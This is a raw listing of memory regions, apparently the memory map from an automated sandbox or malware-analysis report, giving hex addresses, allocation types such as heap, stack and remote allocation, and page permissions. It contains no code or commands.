page read and write
26710000
trusted library allocation
page read and write
646000
heap
page read and write
26630000
trusted library allocation
page read and write
6FFE000
stack
page read and write
267257AF000
heap
page read and write
26610000
trusted library allocation
page read and write
E63A1CF000
stack
page read and write
26727858000
trusted library allocation
page read and write
806E000
stack
page read and write
6FBE000
stack
page read and write
266F0000
trusted library allocation
page read and write
24C19000
trusted library allocation
page read and write
264DF000
stack
page read and write
7048F000
unkown
page readonly
25B00000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
25B04000
trusted library allocation
page read and write
20B00BC0000
heap
page read and write
26710000
trusted library allocation
page read and write
2490A000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26727F8A000
trusted library allocation
page read and write
59F1000
trusted library allocation
page read and write
238FE000
trusted library allocation
page read and write
26760000
trusted library allocation
page read and write
7340000
trusted library allocation
page execute and read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
7FFAAC570000
trusted library allocation
page read and write
20B00C4A000
heap
page read and write
238A6000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
E63A5FE000
stack
page read and write
24919000
trusted library allocation
page read and write
24A78000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
20B00B81000
heap
page read and write
C29000
trusted library allocation
page read and write
7420000
trusted library allocation
page read and write
20B00B7C000
heap
page read and write
E63B5CD000
stack
page read and write
258A6000
trusted library allocation
page read and write
25C90000
heap
page read and write
25EA0000
trusted library allocation
page read and write
2673F703000
heap
page read and write
70471000
unkown
page execute read
266C0000
trusted library allocation
page read and write
72D000
stack
page read and write
20B00A40000
heap
page read and write
7FFAAC620000
trusted library allocation
page read and write
266D7000
trusted library allocation
page read and write
B4E000
stack
page read and write
26710000
trusted library allocation
page read and write
20B00B50000
heap
page read and write
23ADD000
trusted library allocation
page read and write
F0D000
stack
page read and write
23B9E000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
20B0293E000
heap
page read and write
2655F000
stack
page read and write
26610000
trusted library allocation
page read and write
7FFAAC366000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
23758000
trusted library allocation
page read and write
7368000
trusted library allocation
page read and write
25981000
trusted library allocation
page read and write
24781FB000
stack
page read and write
25980000
trusted library allocation
page read and write
7FFAAC2B4000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
7FFAAC461000
trusted library allocation
page read and write
20B02AB1000
heap
page read and write
81D0000
heap
page read and write
26610000
trusted library allocation
page read and write
20B00BFF000
heap
page read and write
7FFAAC36C000
trusted library allocation
page execute and read and write
498B000
stack
page read and write
E63A777000
stack
page read and write
80D0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
E63B6CB000
stack
page read and write
266F0000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
20B02AA1000
heap
page read and write
266C0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2ECA000
heap
page read and write
20B02B80000
heap
page read and write
2588B000
trusted library allocation
page read and write
26727100000
heap
page execute and read and write
26727050000
heap
page readonly
BEB9000
direct allocation
page execute and read and write
7FFB1E870000
unkown
page read and write
20B00C02000
heap
page read and write
49E1000
trusted library allocation
page read and write
20B02949000
heap
page read and write
71E0000
heap
page read and write
6EC000
stack
page read and write
26610000
trusted library allocation
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
7FFB1E851000
unkown
page execute read
20B02AE8000
heap
page read and write
94A6000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
C13000
trusted library allocation
page execute and read and write
25EA0000
trusted library allocation
page read and write
20B0294A000
heap
page read and write
20B02949000
heap
page read and write
8458000
trusted library allocation
page read and write
20B00C50000
heap
page read and write
BF0000
trusted library section
page read and write
4A0000
heap
page readonly
25CCC000
heap
page read and write
20B00B8E000
heap
page read and write
8700000
direct allocation
page read and write
25980000
trusted library allocation
page read and write
2370E000
stack
page read and write
266C0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
20B02AB6000
heap
page read and write
25980000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
4A3A000
trusted library allocation
page read and write
E63AAFE000
stack
page read and write
CE7000
heap
page read and write
23AE9000
trusted library allocation
page read and write
20B02951000
heap
page read and write
7FFB1E850000
unkown
page readonly
20B00C3F000
heap
page read and write
4190000
remote allocation
page execute and read and write
20B02AA4000
heap
page read and write
258C0000
trusted library allocation
page read and write
C85000
heap
page read and write
266F0000
trusted library allocation
page read and write
20B00C1F000
heap
page read and write
25EA0000
trusted library allocation
page read and write
24AC3000
trusted library allocation
page read and write
238ED000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
267256D0000
heap
page read and write
425000
trusted library allocation
page execute and read and write
20B00C0D000
heap
page read and write
20B00C13000
heap
page read and write
25980000
trusted library allocation
page read and write
2673FA76000
heap
page read and write
20B029A3000
heap
page read and write
20B02B81000
heap
page read and write
C42000
trusted library allocation
page read and write
8560000
trusted library allocation
page execute and read and write
8456000
trusted library allocation
page read and write
7FFB1E872000
unkown
page readonly
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
750D000
stack
page read and write
265F0000
trusted library allocation
page read and write
265E0000
trusted library allocation
page execute and read and write
265F0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2673FA65000
heap
page read and write
25980000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
24C15000
trusted library allocation
page read and write
26729165000
trusted library allocation
page read and write
7FFAAC370000
trusted library allocation
page execute and read and write
8027000
stack
page read and write
26727845000
trusted library allocation
page read and write
239D4000
trusted library allocation
page read and write
26727854000
trusted library allocation
page read and write
7FFAAC4D0000
trusted library allocation
page read and write
2EC0000
heap
page read and write
80B0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
CCC000
heap
page read and write
2593D000
stack
page read and write
20B02A30000
heap
page read and write
20B00C3F000
heap
page read and write
D1D000
heap
page read and write
25980000
trusted library allocation
page read and write
2495E000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
23B3C000
trusted library allocation
page read and write
6EF0000
heap
page execute and read and write
20B02A3D000
heap
page read and write
7510000
trusted library allocation
page execute and read and write
6E9D000
stack
page read and write
C00000
trusted library allocation
page read and write
20B029A4000
heap
page read and write
2673F8D4000
heap
page read and write
26710000
trusted library allocation
page read and write
24BD8000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
D9C000
stack
page read and write
25980000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
2673F7BF000
heap
page read and write
866D000
stack
page read and write
26727FA2000
trusted library allocation
page read and write
25C83000
heap
page read and write
24A47000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
BF0000
direct allocation
page read and write
265F0000
trusted library allocation
page read and write
26727090000
trusted library allocation
page read and write
8740000
trusted library allocation
page execute and read and write
20B02AB6000
heap
page read and write
25980000
trusted library allocation
page read and write
24BEA000
trusted library allocation
page read and write
644000
heap
page read and write
20B02949000
heap
page read and write
26720000
trusted library allocation
page read and write
20B00C02000
heap
page read and write
20B0293A000
heap
page read and write
47FA000
heap
page read and write
26610000
trusted library allocation
page read and write
20B02965000
heap
page read and write
25EA0000
trusted library allocation
page read and write
26727350000
heap
page execute and read and write
24A97000
trusted library allocation
page read and write
8445000
trusted library allocation
page read and write
BA0000
direct allocation
page read and write
7FFAAC5E0000
trusted library allocation
page read and write
7FFB1A746000
unkown
page readonly
4C7000
heap
page read and write
6D30000
direct allocation
page read and write
7210000
heap
page execute and read and write
26610000
trusted library allocation
page read and write
24AFB000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
7FFAAC560000
trusted library allocation
page read and write
86AC000
stack
page read and write
25CCF000
heap
page read and write
24BDA000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
49C0000
direct allocation
page read and write
265F0000
trusted library allocation
page read and write
26725710000
heap
page read and write
26610000
trusted library allocation
page read and write
7FFB1E866000
unkown
page readonly
20B02B3D000
heap
page read and write
2673FCE0000
heap
page read and write
266B0000
trusted library allocation
page read and write
2673F8A7000
heap
page execute and read and write
25980000
trusted library allocation
page read and write
5EF000
heap
page read and write
20B029A3000
heap
page read and write
20B00D55000
heap
page read and write
20B00C0D000
heap
page read and write
2673FA05000
heap
page read and write
26610000
trusted library allocation
page read and write
E63A083000
stack
page read and write
25980000
trusted library allocation
page read and write
20B00B7D000
heap
page read and write
5A09000
trusted library allocation
page read and write
1E3000
trusted library allocation
page execute and read and write
266D0000
trusted library allocation
page read and write
2E70000
heap
page read and write
2673F8B0000
heap
page read and write
23A9A000
trusted library allocation
page read and write
25B20000
heap
page read and write
7FFAAC480000
trusted library allocation
page execute and read and write
20B02AA1000
heap
page read and write
248A4000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
23ABC000
trusted library allocation
page read and write
20B02C03000
heap
page read and write
7FFAAC4C0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
4309000
remote allocation
page execute and read and write
20B02B80000
heap
page read and write
D1F000
stack
page read and write
7509000
remote allocation
page execute and read and write
26727868000
trusted library allocation
page read and write
20B02941000
heap
page read and write
25990000
trusted library allocation
page read and write
BD0000
direct allocation
page read and write
26640000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
238E5000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
7FFAAC5A0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
20B02933000
heap
page read and write
265F0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
23BC6000
trusted library allocation
page read and write
5E8000
heap
page read and write
6B09000
remote allocation
page execute and read and write
266C0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
5F5000
heap
page read and write
25EA0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26600000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
E63AB7B000
stack
page read and write
238DD000
trusted library allocation
page read and write
267270D0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
23830000
heap
page read and write
265F0000
trusted library allocation
page read and write
24B65000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
25B00000
trusted library allocation
page read and write
20B00D10000
remote allocation
page read and write
25980000
trusted library allocation
page read and write
20B00C3F000
heap
page read and write
2EA0000
trusted library allocation
page read and write
20B02AA1000
heap
page read and write
267257AD000
heap
page read and write
26620000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
6109000
remote allocation
page execute and read and write
265F0000
trusted library allocation
page read and write
249F1000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
47F8000
heap
page read and write
265F0000
trusted library allocation
page read and write
26730000
trusted library allocation
page execute and read and write
430000
trusted library allocation
page execute and read and write
267271C0000
heap
page read and write
AAB9000
direct allocation
page execute and read and write
25ABE000
stack
page read and write
25980000
trusted library allocation
page read and write
20B02AB6000
heap
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
72EE000
stack
page read and write
E63A10E000
stack
page read and write
25980000
trusted library allocation
page read and write
20B0295D000
heap
page read and write
23B3A000
trusted library allocation
page read and write
267291DC000
trusted library allocation
page read and write
8212000
heap
page read and write
7FFAAC396000
trusted library allocation
page execute and read and write
9146000
trusted library allocation
page read and write
2362A000
stack
page read and write
238F9000
trusted library allocation
page read and write
2E90000
trusted library allocation
page execute and read and write
6EDB000
stack
page read and write
258D0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
7FFB1A752000
unkown
page readonly
26729169000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
57A000
heap
page read and write
265F0000
trusted library allocation
page read and write
26729147000
trusted library allocation
page read and write
26620000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
24841000
trusted library allocation
page read and write
20B0295A000
heap
page read and write
E1E000
stack
page read and write
23540000
remote allocation
page read and write
8730000
direct allocation
page read and write
25980000
trusted library allocation
page read and write
23AF0000
trusted library allocation
page read and write
E63A4FE000
stack
page read and write
20B00C05000
heap
page read and write
258C0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
26720000
trusted library allocation
page read and write
7FFAAC497000
trusted library allocation
page read and write
5F2000
heap
page read and write
26610000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
48BE000
stack
page read and write
A0B9000
direct allocation
page execute and read and write
26630000
trusted library allocation
page execute and read and write
E63A8F9000
stack
page read and write
26610000
trusted library allocation
page read and write
8415000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2357E000
stack
page read and write
2E2E000
stack
page read and write
2673F72C000
heap
page read and write
C20000
direct allocation
page read and write
E63AA7E000
stack
page read and write
2673F700000
heap
page read and write
B4B9000
direct allocation
page execute and read and write
6F3E000
stack
page read and write
267256F0000
heap
page read and write
C5D000
heap
page read and write
25EA0000
trusted library allocation
page read and write
2673F7EB000
heap
page read and write
25980000
trusted library allocation
page read and write
6D20000
direct allocation
page read and write
25980000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
7FFAAC550000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
24778FE000
stack
page read and write
472E000
stack
page read and write
73A0000
trusted library allocation
page read and write
20B02C02000
heap
page read and write
8430000
trusted library allocation
page read and write
2672919A000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
25EAD000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
7FFAAC5C0000
trusted library allocation
page read and write
20B02B15000
heap
page read and write
23A01000
trusted library allocation
page read and write
E63A47E000
stack
page read and write
2673FA7C000
heap
page read and write
7FFAAC520000
trusted library allocation
page read and write
20B02965000
heap
page read and write
CEF000
heap
page read and write
25CCF000
heap
page read and write
26600000
trusted library allocation
page execute and read and write
7205000
heap
page read and write
25990000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
49A0000
direct allocation
page read and write
7FFAAC450000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
2672783C000
trusted library allocation
page read and write
2673F9B3000
heap
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
20B02A3D000
heap
page read and write
71EA000
heap
page read and write
266E0000
trusted library allocation
page read and write
20B02A85000
heap
page read and write
2673F8A0000
heap
page execute and read and write
20B02962000
heap
page read and write
7DF46D8C0000
trusted library allocation
page execute and read and write
8070000
trusted library allocation
page read and write
6D40000
direct allocation
page read and write
2673F75C000
heap
page read and write
9F40000
direct allocation
page execute and read and write
23667000
stack
page read and write
23BC4000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25900000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
8224000
heap
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2589E000
trusted library allocation
page read and write
265DF000
stack
page read and write
23AE5000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
26725715000
heap
page read and write
23B2D000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
C30000
direct allocation
page read and write
7520000
heap
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
20B00C3F000
heap
page read and write
25990000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
26650000
trusted library allocation
page read and write
20B02949000
heap
page read and write
25980000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25CC9000
heap
page read and write
24869000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
20B02A8F000
heap
page read and write
26750000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
24B4F000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
24A43000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
23B71000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
24854000
trusted library allocation
page read and write
80A0000
trusted library allocation
page read and write
20B02B15000
heap
page read and write
6D50000
direct allocation
page read and write
20B02A71000
heap
page read and write
20B00B80000
heap
page read and write
2382C000
stack
page read and write
267278BF000
trusted library allocation
page read and write
4C7000
heap
page read and write
248F4000
trusted library allocation
page read and write
5F5000
heap
page read and write
20B0294A000
heap
page read and write
258D0000
trusted library allocation
page read and write
23B36000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
410000
trusted library allocation
page read and write
20B02A8F000
heap
page read and write
20B02963000
heap
page read and write
23A06000
trusted library allocation
page read and write
7FFAAC4B0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
490000
heap
page read and write
7330000
trusted library allocation
page read and write
C8B9000
direct allocation
page execute and read and write
239C5000
trusted library allocation
page read and write
81ED000
heap
page read and write
26727040000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
7FFAAC580000
trusted library allocation
page read and write
84DC000
stack
page read and write
265F0000
trusted library allocation
page read and write
266F0000
trusted library allocation
page read and write
25CB1000
heap
page read and write
23BCD000
trusted library allocation
page read and write
24B3F000
trusted library allocation
page read and write
20B00D10000
remote allocation
page read and write
BC0000
heap
page read and write
E63A7F6000
stack
page read and write
25EA0000
trusted library allocation
page read and write
26729180000
trusted library allocation
page read and write
DDD000
stack
page read and write
20B00C3F000
heap
page read and write
265F0000
trusted library allocation
page read and write
25C36000
heap
page read and write
25EA0000
trusted library allocation
page read and write
C40000
direct allocation
page read and write
25981000
trusted library allocation
page read and write
73F0000
trusted library allocation
page read and write
2388E000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
2673F7F6000
heap
page read and write
26610000
trusted library allocation
page read and write
E40000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
2597E000
stack
page read and write
26620000
trusted library allocation
page read and write
24A06000
trusted library allocation
page read and write
23690000
heap
page execute and read and write
8F41000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
2659E000
stack
page read and write
266C0000
trusted library allocation
page read and write
20B00C0D000
heap
page read and write
20B02B55000
heap
page read and write
7FFAAC4A0000
trusted library allocation
page execute and read and write
25B0A000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
24B46000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2477CFF000
stack
page read and write
7FFAAC3D0000
trusted library allocation
page execute and read and write
23A95000
trusted library allocation
page read and write
20B02C09000
heap
page read and write
26600000
trusted library allocation
page read and write
7ED000
stack
page read and write
24B39000
trusted library allocation
page read and write
234DD000
stack
page read and write
258E0000
heap
page read and write
70486000
unkown
page readonly
7380000
trusted library allocation
page read and write
400000
trusted library allocation
page read and write
20B02AB6000
heap
page read and write
20B02A8F000
heap
page read and write
239CF000
trusted library allocation
page read and write
8241000
heap
page read and write
748B000
stack
page read and write
47DE000
stack
page read and write
20B02A31000
heap
page read and write
20B02B30000
heap
page read and write
23BF5000
trusted library allocation
page read and write
25B21000
heap
page read and write
7410000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
42B000
trusted library allocation
page execute and read and write
24779FE000
stack
page read and write
7440000
trusted library allocation
page read and write
C1D000
trusted library allocation
page execute and read and write
26710000
trusted library allocation
page read and write
24AE3000
trusted library allocation
page read and write
20B02BD3000
heap
page read and write
25980000
trusted library allocation
page read and write
E63A18E000
stack
page read and write
BAE000
stack
page read and write
BC0000
direct allocation
page read and write
266C0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
24B4C000
trusted library allocation
page read and write
479E000
stack
page read and write
238B0000
trusted library allocation
page read and write
26727FB9000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25C20000
heap
page read and write
20B02AA9000
heap
page read and write
20B02946000
heap
page read and write
86F0000
direct allocation
page read and write
73E0000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
258E0000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
26640000
trusted library allocation
page execute and read and write
25EA0000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
7FFAAC4E0000
trusted library allocation
page read and write
26620000
trusted library allocation
page execute and read and write
25CCD000
heap
page read and write
267373C1000
trusted library allocation
page read and write
727000
stack
page read and write
639000
heap
page read and write
267292F1000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
93CF000
trusted library allocation
page read and write
20B02A33000
heap
page read and write
266C0000
trusted library allocation
page read and write
2673F7C4000
heap
page read and write
25980000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
20B02965000
heap
page read and write
26640000
trusted library allocation
page read and write
266F0000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
26620000
trusted library allocation
page read and write
7FFAAC2C0000
trusted library allocation
page read and write
26727A88000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25C4E000
heap
page read and write
266F0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
20B00D50000
heap
page read and write
6F7E000
stack
page read and write
2485B000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
23BC8000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
267255F0000
heap
page read and write
26710000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
267373D0000
trusted library allocation
page read and write
25892000
trusted library allocation
page read and write
267271C5000
heap
page read and write
26700000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
483F000
stack
page read and write
267376BA000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
726E000
stack
page read and write
25A7E000
stack
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
7EF90000
trusted library allocation
page execute and read and write
24994000
trusted library allocation
page read and write
23AA0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
20B02930000
heap
page read and write
25980000
trusted library allocation
page read and write
238B4000
trusted library allocation
page read and write
2651E000
stack
page read and write
26720000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
427000
trusted library allocation
page execute and read and write
1D0000
trusted library allocation
page read and write
7400000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
94C1000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
258D0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
2672576F000
heap
page read and write
265F0000
trusted library allocation
page read and write
849C000
stack
page read and write
25990000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
8201000
heap
page read and write
26610000
trusted library allocation
page read and write
7048D000
unkown
page read and write
267376AC000
trusted library allocation
page read and write
26620000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
23BD2000
trusted library allocation
page read and write
7FFAAC590000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
2672576B000
heap
page read and write
20B02A6F000
heap
page read and write
26610000
trusted library allocation
page read and write
20B00C34000
heap
page read and write
494D000
stack
page read and write
7FFAAC630000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
4D09000
remote allocation
page execute and read and write
C20000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
20B0294A000
heap
page read and write
487E000
stack
page read and write
2587E000
stack
page read and write
20B00C02000
heap
page read and write
26728820000
trusted library allocation
page read and write
7A0000
heap
page read and write
24B34000
trusted library allocation
page read and write
26727446000
trusted library allocation
page read and write
24932000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
7FFAAC469000
trusted library allocation
page read and write
23AE3000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
24861000
trusted library allocation
page read and write
20B02949000
heap
page read and write
258C0000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2588E000
trusted library allocation
page read and write
7F09000
remote allocation
page execute and read and write
23540000
remote allocation
page read and write
20B00C2A000
heap
page read and write
7FFAAC492000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
9405000
trusted library allocation
page read and write
2497E000
trusted library allocation
page read and write
2477529000
stack
page read and write
26610000
trusted library allocation
page read and write
422000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
7FFB1E875000
unkown
page readonly
267273B0000
heap
page read and write
265F0000
trusted library allocation
page read and write
72AF000
stack
page read and write
20B00C13000
heap
page read and write
26610000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
7540000
heap
page read and write
26750000
trusted library allocation
page read and write
2673FA26000
heap
page read and write
20B02A3D000
heap
page read and write
238F1000
trusted library allocation
page read and write
258B2000
trusted library allocation
page read and write
BE0000
trusted library section
page read and write
20B02B3F000
heap
page read and write
25980000
trusted library allocation
page read and write
24BC2000
trusted library allocation
page read and write
7FFAAC4F0000
trusted library allocation
page read and write
E63B54E000
stack
page read and write
25980000
trusted library allocation
page read and write
267273C1000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
20B02949000
heap
page read and write
26710000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
550000
direct allocation
page read and write
5D9000
heap
page read and write
20B02B13000
heap
page read and write
7530000
heap
page read and write
20B00C1E000
heap
page read and write
20B00C13000
heap
page read and write
2477DFB000
stack
page read and write
26610000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
258E0000
trusted library allocation
page read and write
59E1000
trusted library allocation
page read and write
20B02B13000
heap
page read and write
7FFAAC2B3000
trusted library allocation
page execute and read and write
258D0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
631000
heap
page read and write
25980000
trusted library allocation
page read and write
239F3000
trusted library allocation
page read and write
20B02B14000
heap
page read and write
86C0000
trusted library allocation
page read and write
20B02AA1000
heap
page read and write
26610000
trusted library allocation
page read and write
25B21000
heap
page read and write
239C7000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
7FFAAC360000
trusted library allocation
page read and write
2673F75A000
heap
page read and write
23947000
trusted library allocation
page read and write
2673F9B0000
heap
page read and write
8239000
heap
page read and write
25980000
trusted library allocation
page read and write
D02000
heap
page read and write
93EA000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
20B00B62000
heap
page read and write
25980000
trusted library allocation
page read and write
267275E8000
trusted library allocation
page read and write
4750000
heap
page read and write
25EA0000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
7FFAAC610000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
80C0000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
46AC000
stack
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
7119000
heap
page read and write
85AE000
stack
page read and write
9420000
trusted library allocation
page read and write
20B02931000
heap
page read and write
C45000
trusted library allocation
page execute and read and write
7FFAAC2B2000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
20B02AA1000
heap
page read and write
7FFB1A750000
unkown
page read and write
86E0000
direct allocation
page read and write
25EA0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
258C0000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
20B02B4D000
heap
page read and write
26725773000
heap
page read and write
7FFAAC495000
trusted library allocation
page read and write
E63A57C000
stack
page read and write
2673FA51000
heap
page read and write
7430000
trusted library allocation
page execute and read and write
8600000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
8245000
heap
page read and write
25980000
trusted library allocation
page read and write
2673FA36000
heap
page read and write
20B00D10000
remote allocation
page read and write
20B02949000
heap
page read and write
20B02AB6000
heap
page read and write
26640000
trusted library allocation
page read and write
26729143000
trusted library allocation
page read and write
238B8000
trusted library allocation
page read and write
7F0000
heap
page read and write
7FFAAC2CB000
trusted library allocation
page read and write
23B20000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
2484F000
trusted library allocation
page read and write
717F000
heap
page read and write
238E1000
trusted library allocation
page read and write
25CA0000
heap
page read and write
235E0000
direct allocation
page read and write
62E000
heap
page read and write
265F0000
trusted library allocation
page read and write
267271D9000
heap
page read and write
24AEC000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26630000
trusted library allocation
page read and write
7FFAAC530000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
C10000
